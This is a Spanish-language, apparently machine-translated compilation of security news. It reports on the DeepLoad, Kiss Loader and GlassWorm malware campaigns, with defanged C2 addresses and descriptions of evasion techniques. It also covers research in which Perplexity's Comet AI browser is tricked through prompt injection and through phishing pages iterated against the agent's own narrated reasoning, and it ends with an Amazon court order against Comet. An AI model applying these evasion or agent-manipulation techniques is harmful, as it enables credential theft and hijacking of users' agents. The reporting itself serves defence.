  2. Aplique controles de seguridad específicos a las extensiones de IA: Las extensiones de IA representan un riesgo enorme debido a sus permisos elevados que pueden exponer sesiones de SaaS, identidades y datos confidenciales del navegador. Las organizaciones deberían aplicar políticas de gobernanza más estrictas para controlar cómo estas extensiones interactúan con los entornos empresariales.
  3. Analice el comportamiento de las extensiones, no solo los parámetros estáticos: Las aprobaciones estáticas no son suficientes. El riesgo debe evaluarse continuamente en función de los permisos, el comportamiento y los cambios a lo largo del tiempo.
  4. Hacer cumplir los requisitos de confianza y transparencia: Las extensiones que tienen un número de instalaciones muy bajo, carecen de políticas de privacidad o muestran un historial de mantenimiento deficiente deben tratarse como de mayor riesgo. Establecer criterios mínimos de confianza ayuda a reducir la exposición a extensiones no verificadas o abandonadas.

Una nueva lente sobre un viejo problema

Durante años, las extensiones del navegador se han tratado como una característica conveniente. Algo que permita la productividad y la personalización. Sin embargo, ya no son un riesgo periférico. Son una parte fundamental de la superficie de ataque empresarial. Ampliamente utilizados, altamente privilegiados y en gran medida no monitoreados, crean exposición directa a datos confidenciales y sesiones de usuarios.

Descargue el informe completo de seguridad de extensiones de LayerX para comprender el alcance completo de estos hallazgos, identificar dónde se encuentra realmente su exposición y obtener un camino claro para controlar esta creciente superficie de ataque sin interrumpir la productividad.

¿Encontró interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síguenos en noticias de google, Gorjeo y LinkedIn para leer más contenido exclusivo que publicamos.

El malware DeepLoad utiliza ClickFix y la persistencia de WMI para robar credenciales del navegador – CYBERDEFENSA.MX

Una nueva campaña ha aprovechado la táctica de ingeniería social de ClickFix como una forma de distribuir un cargador de malware previamente no documentado conocido como Carga profunda.

«Es probable que utilice ofuscación asistida por IA e inyección de procesos para evadir el escaneo estático, mientras que el robo de credenciales comienza inmediatamente y captura contraseñas y sesiones incluso si el cargador principal está bloqueado», afirman los investigadores de ReliaQuest Thassanai McCabe y Andrew Currie. dicho en un informe compartido con The Hacker News.

El punto de partida de la cadena de ataque es un señuelo ClickFix que engaña a los usuarios para que ejecuten comandos de PowerShell pegando el comando en el cuadro de diálogo Ejecutar de Windows con el pretexto de abordar un problema inexistente. Este, a su vez, utiliza «mshta.exe», una utilidad legítima de Windows para descargar y ejecutar un cargador PowerShell ofuscado.

Se ha descubierto que el cargador, por su parte, oculta su funcionalidad real entre asignaciones de variables sin sentido, probablemente en un intento de engañar a las herramientas de seguridad. Se evalúa que los actores de amenazas confiaron en una herramienta de inteligencia artificial (IA) para desarrollar la capa de ofuscación.

Ciberseguridad

DeepLoad hace esfuerzos deliberados para integrarse con la actividad habitual de Windows y pasar desapercibido. Esto incluye ocultar la carga útil dentro de un ejecutable llamado «LockAppHost.exe», un proceso legítimo de Windows que administra la pantalla de bloqueo.

Además, el malware oculta sus propias huellas al desactivar el historial de comandos de PowerShell e invocar directamente las funciones principales nativas de Windows en lugar de depender de los comandos integrados de PowerShell para iniciar procesos y modificar la memoria. Al hacerlo, evita los ganchos de monitoreo comunes que controlan la actividad basada en PowerShell.

«Para evadir la detección basada en archivos, DeepLoad genera un componente secundario sobre la marcha utilizando la característica incorporada de PowerShell Add-Type, que compila y ejecuta código escrito en C#», dijo ReliaQuest. «Esto produce un archivo temporal de biblioteca de vínculos dinámicos (DLL) que se coloca en el directorio Temp del usuario».

Esto ofrece una manera para que el malware eluda las detecciones basadas en nombres de archivos, ya que la DLL se compila cada vez que se ejecuta y se escribe con un nombre de archivo aleatorio.

Otra táctica de evasión de defensa notable adoptada por DeepLoad es el uso de inyección de llamada a procedimiento asincrónico (APC) para ejecutar la carga útil principal dentro de un proceso confiable de Windows sin una carga útil decodificada escrita en el disco después de iniciar el proceso de destino en un estado suspendido, escribir shellcode en su memoria y luego reanudar la ejecución del proceso.

DeepLoad está diseñado para facilitar el robo de credenciales extrayendo las contraseñas del navegador del host. También elimina una extensión de navegador maliciosa que intercepta las credenciales a medida que se ingresan en las páginas de inicio de sesión y persiste en las sesiones de los usuarios a menos que se elimine explícitamente.

Una característica más peligrosa del malware es su capacidad de detectar automáticamente cuando se conectan dispositivos de medios extraíbles, como unidades USB, y copiar los archivos con malware usando nombres como «ChromeSetup.lnk», «Firefox Installer.lnk» y «AnyDesk.lnk» para desencadenar la infección una vez que se hace doble clic.

«DeepLoad utilizó el Instrumental de administración de Windows (WMI) para reinfectar un host ‘limpio’ tres días después sin acción del usuario ni interacción del atacante», explicó ReliaQuest. «WMI cumplió dos propósitos: rompió las cadenas de procesos padre-hijo para las cuales la mayoría de las reglas de detección están diseñadas para detectar, y creó una suscripción de evento WMI que silenciosamente volvió a ejecutar el ataque más tarde».

Al parecer, el objetivo es implementar malware multipropósito que pueda realizar acciones maliciosas a lo largo de la cadena de ciberataque y eludir la detección mediante controles de seguridad al evitar escribir artefactos en el disco, mezclarse con los procesos de Windows y propagarse rápidamente a otras máquinas.

Ciberseguridad

La divulgación viene como G DATA detallado otro cargador de malware denominado Kiss Loader que se distribuye a través de archivos de acceso directo a Internet (URL) de Windows adjuntos a correos electrónicos de phishing, que luego se conecta a un recurso WebDAV remoto alojado en un dominio TryCloudflare para ofrecer un acceso directo secundario que se hace pasar por un documento PDF.

Una vez ejecutado, el acceso directo inicia un script WSH responsable de ejecutar un componente JavaScript, que procede a recuperar y ejecutar un script por lotes que muestra un PDF señuelo, configura la persistencia en la carpeta Inicio y descarga el Kiss Loader basado en Python. En la etapa final, el cargador descifra y ejecuta Venom RAT, una variante de AsyncRAT, usando inyección APC.

Actualmente no se sabe qué tan extendidos están los ataques que implementan Kiss Loader y si se ofrece bajo un modelo de malware como servicio (MaaS). Dicho esto, el actor de amenazas detrás del cargador afirma ser de Malawi.

El malware GlassWorm utiliza Solana Dead Drops para entregar RAT y robar datos criptográficos y del navegador – CYBERDEFENSA.MX

Los investigadores de ciberseguridad han señalado una nueva evolución de la campaña GlassWorm que ofrece un marco de múltiples etapas capaz de robar datos integrales e instalar un troyano de acceso remoto (RAT), que implementa una extensión de Google Chrome para robar información haciéndose pasar por una versión fuera de línea de Google Docs.

«Registra las pulsaciones de teclas, descarga cookies y tokens de sesión, realiza capturas de pantalla y recibe comandos de un servidor C2 oculto en una nota de la cadena de bloques Solana», dijo el investigador de seguridad de Aikido Ilyas Makari. dicho en un informe publicado la semana pasada.

GlassWorm es el apodo asignado a una campaña persistente que obtiene un punto de apoyo inicial a través de paquetes maliciosos publicados en npm, PyPI, GitHub y el mercado Open VSX. Además, se sabe que los operadores comprometen las cuentas de los mantenedores del proyecto para enviar actualizaciones envenenadas.

Los ataques son lo suficientemente cuidadosos como para evitar infectar sistemas con una configuración regional rusa y utilizan transacciones de Solana como un sistema de resolución muerta para recuperar el servidor de comando y control (C2) («45.32.150[.]251») y descargar cargas útiles específicas del sistema operativo.

La carga útil de la etapa dos es un marco de robo de datos con capacidades de recolección de credenciales, exfiltración de billeteras de criptomonedas y creación de perfiles del sistema. Los datos recopilados se comprimen en un archivo ZIP y se extraen a un servidor externo («217.69.3[.]152/pared»). También incorpora funcionalidad para recuperar y lanzar la carga útil final.

Una vez que se transmiten los datos, la cadena de ataque implica recuperar dos componentes adicionales: un binario .NET diseñado para llevar a cabo phishing de billetera de hardware y un RAT JavaScript basado en Websocket para desviar datos del navegador web y ejecutar código arbitrario. La carga útil RAT se obtiene de «45.32.150[.]251» mediante el uso de una URL de evento pública de Google Calendar como solucionador de caídas muertas.

Ciberseguridad

El binario .NET aprovecha la infraestructura del Instrumental de administración de Windows (WMI) para detectar conexiones de dispositivos USB y muestra una ventana de phishing cuando se conecta una billetera de hardware Ledger o Trezor.

«La interfaz de usuario de Ledger muestra un error de configuración falso y presenta 24 campos de entrada de frases de recuperación numerados», señaló Makari. «La interfaz de usuario de Trezor muestra un mensaje falso de ‘Error en la validación del firmware, iniciando reinicio de emergencia’ con el mismo diseño de entrada de 24 palabras. Ambas ventanas incluyen un botón ‘RESTAURAR WALLET’».

El malware no sólo elimina cualquier proceso real de Ledger Live que se esté ejecutando en el host de Windows, sino que también vuelve a mostrar la ventana de phishing si la víctima la cierra. El objetivo final del ataque es capturar la frase de recuperación de la billetera y transmitirla a la dirección IP «45.150.34[.]158.»

La RAT, por otro lado, utiliza una tabla hash distribuida (DHT) para recuperar los detalles de C2. En caso de que el mecanismo no devuelva ningún valor, el malware cambia al punto muerto basado en Solana. Luego, la RAT establece comunicación con el servidor para ejecutar varios comandos en el sistema comprometido:

  • start_hvnc / stop_hvnc, para implementar un módulo de Computación de red virtual oculta (HVNC) para acceso a escritorio remoto.
  • start_socks / stop_socks, para iniciar un módulo WebRTC y ejecutarlo como proxy SOCKS.
  • reget_log, para robar datos de navegadores web, como Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi y Mozilla Firefox. El componente está equipado para eludir las protecciones de cifrado vinculado a aplicaciones (ABE) de Chrome.
  • get_system_info, para enviar información del sistema.
  • comando, para ejecutar JavaScript proporcionado por el atacante a través de eval().

La RAT también instala a la fuerza una extensión de Google Chrome llamada Google Docs Offline en sistemas Windows y macOS, que luego se conecta a un servidor C2 y recibe comandos emitidos por el operador, lo que permite recopilar cookies, almacenamiento local y el modelo de objetos de documento completo (DOMINGO) árbol de la pestaña activa, marcadores, capturas de pantalla, pulsaciones de teclas, contenido del portapapeles, hasta 5000 entradas del historial del navegador y la lista de extensiones instaladas.

«La extensión también realiza vigilancia de sesión específica. Extrae las reglas del sitio monitoreado de /api/get-url-for-watch y se envía con Bybit (.bybit.com) preconfigurado como objetivo, vigilando las cookies de token seguro y de identificación del dispositivo», dijo Aikido. «Al ser detectado, activa un webhook detectado por autenticación a /api/webhook/auth-detected que contiene el material de la cookie y los metadatos de la página. El C2 también puede proporcionar reglas de redireccionamiento que fuerzan las pestañas activas a URL controladas por el atacante».

El descubrimiento coincide con otro cambio en las tácticas de GlassWorm, con los atacantes publicando paquetes npm haciéndose pasar por el servidor WaterCrawl Model Context Protocol (MCP) («@iflow-mcp/watercrawl-watercrawl-mcp) para distribuir cargas útiles maliciosas.

Ciberseguridad

«Este es el primer paso confirmado de GlassWorm hacia el ecosistema MCP», dijo el investigador de seguridad de Koi, Lotan Sery. «Y dado lo rápido que está creciendo el desarrollo asistido por IA, y cuánta confianza se otorga a los servidores MCP por diseño, este no será el último».

Se recomienda a los desarrolladores que tengan cuidado al instalar extensiones Open VSX, paquetes npm y servidores MCP. También se recomienda verificar los nombres de los editores, los historiales de paquetes y evitar confiar ciegamente en los recuentos de descargas. La empresa polaca de ciberseguridad AFINE ha publicado una herramienta Python de código abierto llamada cazador de gusanos de cristal para escanear los sistemas de los desarrolladores en busca de cargas útiles asociadas con la campaña.

«El cazador de gusanos de vidrio no realiza ninguna solicitud de red durante el escaneo», dijeron los investigadores Paweł Woyke y Sławomir Zakrzewski. «Sin telemetría. Sin llamadas telefónicas a casa. Sin verificaciones de actualizaciones automáticas. Solo lee archivos locales. La actualización de Glassworm-hunter es el único comando que toca la red. Obtiene la última versión Base de datos de IoC de nuestro GitHub y lo guarda localmente.»

Los investigadores engañan al navegador Comet AI de Perplexity para convertirlo en una estafa de phishing en menos de cuatro minutos

Los navegadores web agentes que aprovechan las capacidades de inteligencia artificial (IA) para ejecutar acciones de forma autónoma en múltiples sitios web en nombre de un usuario podrían ser entrenados y engañados para que sean víctimas de trampas de phishing y estafas.

El ataque, en esencia, aprovecha la tendencia de los navegadores de IA a razonar sus acciones y usarlo contra el modelo mismo para reducir sus barreras de seguridad, Guardio dicho en un informe compartido con The Hacker News antes de su publicación.

«La IA ahora opera en tiempo real, dentro de páginas dinámicas y desordenadas, mientras solicita información continuamente, toma decisiones y narra sus acciones a lo largo del camino. Bueno, ‘narrar’ es un eufemismo: habla, ¡y demasiado!», dijo el investigador de seguridad Shaked Chen.

«Esto es lo que llamamos Parloteo agente: el navegador AI expone lo que ve, lo que cree que está sucediendo, lo que planea hacer a continuación y qué señales considera sospechosas o seguras».

Ciberseguridad

Interceptando este tráfico entre el navegador y los servicios de IA que se ejecutan en los servidores del proveedor y alimentándolo como entrada a una Red Generativa Adversaria (Ganar), Guardio dijo que pudo hacer que el navegador Comet AI de Perplexity fuera víctima de una estafa de phishing en menos de cuatro minutos.

La investigación se basa en técnicas anteriores como VibeScamming y Scamlexity, que descubrieron que las plataformas de codificación de vibraciones y los navegadores de IA podían ser persuadidos para generar páginas fraudulentas o llevar a cabo acciones maliciosas mediante inyecciones de mensajes ocultos. En otras palabras, cuando el agente de IA maneja las tareas sin supervisión humana constante, surge un cambio en la superficie de ataque en el que una estafa ya no tiene que engañar al usuario. Más bien, pretende engañar al propio modelo de IA.

«Si puedes observar lo que el agente considera sospechoso, lo que duda y, lo que es más importante, lo que piensa y parlotea sobre la página, puedes usarlo como señal de entrenamiento», explicó Chen. «La estafa evoluciona hasta que AI Browser cae de manera confiable en la trampa que otra IA le tendió».

La idea, en pocas palabras, es construir una «máquina de estafa» que optimice y regenere de forma iterativa una página de phishing hasta que el navegador agente deje de quejarse y proceda a llevar a cabo las órdenes del actor de la amenaza, como ingresar las credenciales de la víctima en una página web falsa diseñada para llevar a cabo una estafa de reembolso.

Lo que hace que este ataque sea interesante y peligroso es que una vez que el estafador itera en una página web hasta que funciona contra un navegador de IA específico, funciona en todos los usuarios que dependen del mismo agente. Dicho de otra manera, el objetivo ha pasado del usuario humano al navegador de IA.

«Esto revela el desafortunado futuro cercano al que nos enfrentamos: las estafas no sólo se lanzarán y ajustarán en la naturaleza, sino que se entrenarán fuera de línea, según el modelo exacto en el que confían millones de personas, hasta que funcionen perfectamente en el primer contacto», dijo Guardio. «Porque cuando su navegador AI explica por qué se detuvo, les enseña a los atacantes cómo evitarlo».

La divulgación se produce como Trail of Bits. demostrado cuatro técnicas de inyección rápida contra el navegador Comet para extraer información privada de los usuarios de servicios como Gmail explotando el asistente de inteligencia artificial del navegador y extrayendo los datos al servidor de un atacante cuando el usuario solicita resumir una página web bajo su control.

Ciberseguridad

La semana pasada, Zenity Labs también detalló dos ataques sin clic que afectan al cometa de Perplexity y que utilizan una inyección indirecta de avisos sembrada en invitaciones a reuniones para exfiltrar archivos locales a un servidor externo (también conocido como PerplejoCometa) o secuestrar la cuenta 1Password de un usuario si el extensión del administrador de contraseñas está instalado y desbloqueado. Los problemas, denominados colectivamente PerplexedBrowser, han sido abordados desde entonces por la empresa de inteligencia artificial.

Esto se logra mediante una técnica de inyección rápida conocida como colisión de intenciones, que ocurre «cuando el agente fusiona una solicitud de usuario benigna con instrucciones controladas por un atacante a partir de datos web no confiables en un único plan de ejecución, sin una forma confiable de distinguir entre los dos», dijo el investigador de seguridad Stav Cohen.

Los ataques de inyección rápida siguen siendo un desafío de seguridad fundamental para los modelos de lenguajes grandes (LLM) y para su integración en los flujos de trabajo organizacionales, en gran parte porque eliminar por completo estas vulnerabilidades puede no ser factible. En diciembre de 2025, OpenAI señaló que es «poco probable que» tales debilidades se resuelvan por completo en los navegadores agentes, aunque los riesgos asociados podrían reducirse mediante el descubrimiento automatizado de ataques, el entrenamiento de adversarios y nuevas salvaguardas a nivel del sistema.

Un juez federal impide que el navegador de inteligencia artificial de Perplexity realice compras en Amazon

Un juez federal ha bloqueado a Perplexity, creadores del navegador Comet AI, para que no accedan a las cuentas de los usuarios de Amazon y realicen compras en su nombre.

En un 9 de marzo ordenla jueza Maxine Chesney del Tribunal del Distrito Norte de California dijo que la orden temporal refleja la probabilidad de que Amazon “tendrá éxito en cuanto al fondo” de su reclamo de que los agentes de inteligencia artificial de Perplexity violan la Ley de Abuso y Fraude Informático y la Ley Integral de Fraude y Acceso a Datos Informáticos.

El tribunal sostuvo que Amazon “ha proporcionado pruebas sólidas de que Perplexity, a través de su navegador Comet, accede con el permiso del usuario de Amazon pero sin la autorización de Amazon, a la cuenta protegida por contraseña del usuario”.

Según el fallo, Perplexity debe prohibir a Comet acceder, intentar acceder, ayudar, instruir o proporcionar los medios para que otros accedan a las cuentas de usuario de Amazon. Perplexity también debe eliminar todas las cuentas de Amazon y los datos de clientes que recopiló en el camino.

Perplexity dijo al tribunal que las compras eran legítimas y legales porque sus usuarios habían autorizado a su agente de IA a realizar las compras en su nombre. Pero Amazon les ha negado explícitamente ese permiso, diciendo que los agentes cometen errores, interfieren con el propio algoritmo de Amazon y colocan a sus usuarios en un riesgo elevado de ciberseguridad.

Además, Chesney escribió que Amazon ha incurrido en “significativamente más” de los $5,000 necesarios para calificar como fraude informático, incluido el costo del tiempo invertido por los empleados de Amazon en desarrollar nuevas herramientas web para bloquear el acceso de Comet a cuentas privadas de clientes y detectar futuros accesos no autorizados por parte del navegador.

Según Amazonhan pedido a los funcionarios de Perplexity en cinco ocasiones distintas que dejen de acceder de forma encubierta a la tienda de Amazon con sus agentes. En una carta de cese y desistimiento enviada a Perplexity el 31 de octubre de 2025, el abogado Moez Kaba del bufete de abogados Hueston Hennigan escribió a Perplexity, alegando que las compras automatizadas degradan la experiencia de compra en línea de los clientes de Amazon.

Amazon exige que los agentes de IA se identifiquen digitalmente cuando utilizan la plataforma de comercio electrónico. Pero alegaron que los ejecutivos de Perplexity “se negaron a operar de manera transparente y, en cambio, tomaron medidas afirmativas para ocultar sus actividades de agente en la tienda de Amazon”, incluida la configuración de su software para que se haga pasar encubiertamente por tráfico de personas.

«Dicha transparencia es fundamental porque protege el derecho de un proveedor de servicios a monitorear a los agentes de IA y restringir conductas que degradan la experiencia de compra del cliente, erosionan la confianza del cliente y crean riesgos de seguridad para los datos privados de nuestros clientes», escribió Kaba.

Además, dichos agentes podrían representar un riesgo adicional para Amazon a través de vulnerabilidades de ciberseguridad explotadas por los ciberdelincuentes para secuestrar navegadores de inteligencia artificial como Comet.

La falta de respuesta de los ejecutivos de Perplexity a súplicas anteriores de Amazon puede haber influido en la orden judicial, y Chesney señaló que era probable que Amazon sufriera un daño irreparable sin la intervención judicial porque «Perplexity ha dejado claro que, en ausencia de la reparación solicitada, continuará incurriendo en la conducta cuestionada antes mencionada».

El caso podría tener implicaciones más amplias sobre la forma en que se diseñan las herramientas comerciales de agentes de IA y hasta qué punto pueden actuar legalmente en nombre de una persona. En particular, mientras Amazon se opone a las compras dirigidas por IA de Comet, Perplexity afirma que sus usuarios les han dado permiso para realizar compras en su nombre.

Perplexity argumentó que una orden judicial que detuviera las actividades de su IA iría en contra del interés público, privándolos de opciones e innovación como consumidor. Chesney concluyó lo contrario, respaldando el argumento de Amazon de que el público tiene un mayor interés en proteger sus computadoras del acceso no autorizado.

Perplexity no respondió a una solicitud de comentarios sobre el fallo al cierre de esta edición.

Puede leer la orden judicial a continuación.

Greg Otto

Escrito por Greg Otto

Greg Otto es el editor en jefe de CyberScoop y supervisa todo el contenido editorial del sitio web. Greg ha dirigido una cobertura de ciberseguridad que ha ganado varios premios, incluidos los de la Sociedad de Periodistas Profesionales y la Sociedad Estadounidense de Editores de Publicaciones Empresariales. Antes de unirse a Scoop News Group, Greg trabajó para Washington Business Journal, US News & World Report y WTOP Radio. Tiene una licenciatura en periodismo televisivo de la Universidad de Temple.